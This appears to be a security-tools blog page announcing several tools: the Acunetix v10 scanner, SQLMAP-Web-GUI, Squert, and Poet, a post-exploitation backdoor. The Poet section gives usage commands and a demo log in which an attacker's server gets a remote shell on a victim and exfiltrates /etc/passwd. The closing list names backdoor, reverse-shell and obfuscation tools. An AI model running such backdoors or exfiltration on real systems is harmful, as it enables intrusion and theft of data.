The areas of a website which are most likely to be attacked and are prone to vulnerabilities are those areas that require a user to login. Therefore the latest version of Acunetix vastly improves on its ‘Login Sequence Recorder’ which can now navigate multi-step authenticated areas automatically and with ease. It crawls at lightning speed with its ‘DeepScan’ crawling engine now analyzing web applications developed using both Java Frameworks and Ruby on Rails. Version 10 also improves the automated scanning of RESTful and SOAP-based web services and can now detect over 1200 vulnerabilities in WordPress core and plugins.

Automated scanning of restricted areas

Latest automation functionality makes Acunetix not only even easier to use, but gives better peace of mind through ensuring the entire website is scanned. Restricted areas, especially user login pages, make it more difficult for a scanner to access and often required manual intervention. The Acunetix “Login Sequence Recorder” overcomes this, having been significantly improved to allow restricted areas to be scanned completely automatically. This includes the ability to scan web applications that use Single Sign-On (SSO) and OAuth-based authentication. With the recorder following user actions rather than HTTP requests, it drastically improves support for anti-CSRF tokens, nonces or other one-time tokens, which are often used in restricted areas.

Top dog in WordPress vulnerability detection

With WordPress sites having exceeded 74 million in number, a single vulnerability found in the WordPress core, or even in a plugin, can be used to attack millions of individual sites. The flexibility of being able to use externally developed plugins leads to the development of even more vulnerabilities. Acunetix v10 now tests for over 1200 WordPress-specific vulnerabilities, based on the most frequently downloaded plugins, while still retaining the ability to detect vulnerabilities in custom built plugins. No other scanner on the market can detect as many WordPress vulnerabilities.

Support for various development architectures and web services

Many enterprise-grade, mission critical applications are built using Java Frameworks and Ruby on Rails. Version 10 has been engineered to accurately crawl and scan web applications built using these technologies. With the increase in HTML5 Single Page Applications and mobile applications, web services have become a significant attack vector. The new version improves support for SOAP-based web services with WSDL and WCF descriptions as well as automated scanning of RESTful web services using WADL definitions. Furthermore, version 10, introduces dynamic crawl pre-seeding by integrating with external, third-party tools including Fiddler, Burp Suite and the Selenium IDE to enhance Business Logic Testing and the workflow between Manual Testing and Automation.

Detection of Malware and Phishing URLs

Acunetix WVS 10 will ship with a malware URL detection service, which is used to analyse all the external links found during a scan against a constantly updated database of Malware and Phishing URLs. The Malware Detection Service makes use of the Google and Yandex Safe Browsing Database.

New in Acunetix Vulnerability Scanner v10

'Login Sequence Recorder' has been re-engineered from the ground-up to allow restricted areas to be scanned entirely automatically.
Now tests for over 1200 WordPress-specific vulnerabilities in the WordPress core and plugins.
Acunetix WVS Crawl data can be augmented using the output of: Fiddler .saz files, Burp Suite saved items, Burp Suite state files, HTTP Archive (.har) files, Acunetix HTTP Sniffer logs, Selenium IDE Scripts.
Improved support for Java Frameworks (Java Server Faces [JSF], Spring and Struts) and Ruby on Rails.
Increased web services support for web applications which make use of WSDL based web-services, Microsoft WCF-based web services and RESTful web services.
Ships with a malware URL detection service, which is used to analyse all the external links found during a scan against a constantly updated database of Malware and Phishing URLs.

Download Acunetix Web Vulnerability Scanner Version 10

The client program runs on the target machine and is configured with an IP address (the server) to connect to and a frequency to connect at. If the server isn't running when the client tries to connect, the client quietly sleeps and tries again at the next interval. If the server is running however, the attacker gets a control shell to control the client and perform various actions on the target including:

reconnaissance
remote shell
file exfiltration
download and execute
self destruct

Getting started

Go to the releases page and download the latest poet-client and poet-server files available.
Then skip to the Usage section below.
Alternatively, you can build Poet yourself (it's pretty easy). Make sure you have the python2.7 and zip executables available.

$ git clone https://github.com/mossberg/poet
$ cd poet
$ make

This will create a bin/ directory which contains poet-clientand poet-server.

Usage

Poet is super easy to use, and requires nothing more than the Python (2.7) standard library. To easily try it out, a typical invocation would look like:

Terminal 1:

$ ./poet-client -v 127.0.0.1 1

Terminal 2:

$ sudo ./poet-server

Note: By default, the server needs to be run as root (using sudo) because the default port it binds to is 443. If that makes you uncomfortable, simply omit sudo and use the -p <PORT> flag on both the client and server. Pick a nice, high number for your port (> 1024).

Of course, using the -h flag gives you the full usage.

$ ./poet-client -h
usage: poet-client [-h] [-p PORT] [-v] [-d] IP [INTERVAL]

positional arguments:
  IP                    server
  INTERVAL              (s)

optional arguments:
  -h, --help            show this help message and exit
  -p PORT, --port PORT
  -v, --verbose
  -d, --delete          delete client upon execution

$ ./poet-server -h
usage: poet-server [-h] [-p PORT]

optional arguments:
  -h, --help            show this help message and exit
  -p PORT, --port PORT

Demo

This is just a small sample of what poet can do.

The scenario is, an attacker has gotten access to the victim's machine and downloaded and executed the client (in verbose mode ;). He/she does not have the server running at this point, but it's ok, the client waits patiently. Eventually the attacker is ready and starts the server, first starting a shell and executing uname -a, then exfiltrating /etc/passwd. Then he/she exits and detaches from the client, which continues running on the target waiting for the next opportunity to connect to the server.

Victim's Machine (5.4.3.2):

$ ./poet-client -v 1.2.3.4 10
[+] Poet started with interval of 10 seconds to port 443. Ctrl-c to exit.
[!] (2015-03-27 03:40:12.259676) Server is inactive
[!] (2015-03-27 03:40:22.263161) Server is inactive
[!] (2015-03-27 03:40:32.267308) Server is inactive
[+] (2015-03-27 03:40:42.273376) Server is active
[!] (2015-03-27 03:41:07.145979) Server is inactive
[!] (2015-03-27 03:41:17.150634) Server is inactive
[!] (2015-03-27 03:41:27.155614) Server is inactive
[!] (2015-03-27 03:41:37.160440) Server is inactive

Attacker's Machine (1.2.3.4):

# ./poet-server
                          _
        ____  ____  ___  / /_
       / __ \/ __ \/ _ \/ __/
      / /_/ / /_/ /  __/ /
     / .___/\____/\___/\__/
    /_/

[+] Poet server started on 443.
[+] (2015-03-27 03:40:42.272601) Connected By: ('5.4.3.2', 59309) -> VALID
[+] (2015-03-27 03:40:42.273087) Entering control shell
Welcome to psh, the Poet shell!
Running `help' will give you a list of supported commands.
psh > shell
psh > user@server $ uname -a
Linux lolServer 3.8.0-29-generic #42~precise1-Ubuntu SMP Wed May 07 16:19:23 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
psh > user@server $ ^D
psh > exfil /etc/passwd
psh : exfil written to archive/20150327/exfil/passwd-201503274054.txt
psh > help
Commands:
  chint
  dlexec
  exec
  exfil
  exit
  help
  recon
  selfdestruct
  shell
psh > exit
[+] (2015-03-27 03:40:57.144083) Exiting control shell.
[-] (2015-03-27 03:40:57.144149) Poet server terminated.

Download Poet

PHP Frontend to work with the SQLMAP JSON API Server (sqlmapapi.py) to allow for a Web GUI to drive near full functionality of SQLMAP!

Here is a few quick videos to show that almost all of your usual SQLMAP command line functionality is still possible via this Web GUI.

Demo against: Windows 2003 Server, IIS/6.0 + ASP + MS-SQL 2005

Demo against: Linux (CentOS), Apache, MySQL, PHP

Requirements:

Linux, Apache, PHP (check your favorite distro's wiki or forum pages, or use google)
- PHP 5.3+ is suggested, older versions not tests so mileage may vary
Python and any SQLMAP dependencies (refer to their wiki for any help there)
Clone this repo to your machine

Edit the sqlmap/inc/config.php file so the paths all point to the right locations on your system
Copy the entire sqlmap/ directory and contents to your web root directory (cd SQLMAP-Web-GUI && cp -R sqlmap/ /var/www/)
When you want to use, simply fire up the sqlmap API server (python /home/user/tools/sqlmap/sqlmapapi.py -s)
Then you can navigate to the Web GUI address in your Browser to begin (firefox http://127.0.0.1/sqlmap/index.php)

Download SQLMAP-Web-GUI

Squert is a web application that is used to query and view event data stored in a Sguil database (typically IDS alert data). Squert is a visual tool that attempts to provide additional context to events through the use of metadata, time series representations and weighted and logically grouped result sets. The hope is that these views will prompt questions that otherwise may not have been asked.

Intro Video:

Requirements

Sguil 0.9.0 http://sguil.net. If you use Security Onion http://securityonion.blogspot.ca you can get everything setup rather quickly.
PHP55 with CLI
- mysql
TCL, TclX
- mysqltcl
- uri
- ftp
- ftp::geturl
- md5
MySQL client

Download Squert

Proxenet - Hacker Friendly Proxy for Web Application Penetration Tests

MITMf - Framework for Man-In-The-Middle attacks

BruteX - Automatically Brute Force all Services Running on a Target

Medusa - Speedy, Parallel and Modular Login Brute-Forcer

Chrome Autofill Viewer - Tool to View or Delete Autocomplete data from Google Chrome browser

REMnux v6 - A Linux Toolkit for Reverse-Engineering and Analyzing Malware

Crouton - Chromium OS Universal Chroot Environment

icmpsh - Simple Reverse ICMP Shell

Cupp - Common User Passwords Profiler

Gcat - A stealthy Backdoor that uses Gmail as a command and control server

VBS-Obfuscator - VBScript obfuscation to allow PenTesters bypass countermeasures

Cheat - Create and view interactive cheatsheets on the command-line

Security CheatSheets - A collection of cheatsheets for various infosec tools and topics

Just-Metadata - Tool that Gathers and Analyzes Metadata about IP Addresses

TeemIp - IP Address Management Solution

VBScan - An Black Box vBulletin Vulnerability Scanner

Acunetix v10 - Web Application Security Testing Tool

Poet - A simple Post-Exploitation Tool

SQLMAP-Web-GUI - Web GUI to drive near full functionality of SQLMAP

Squert - A Simple QUEry and Report Tool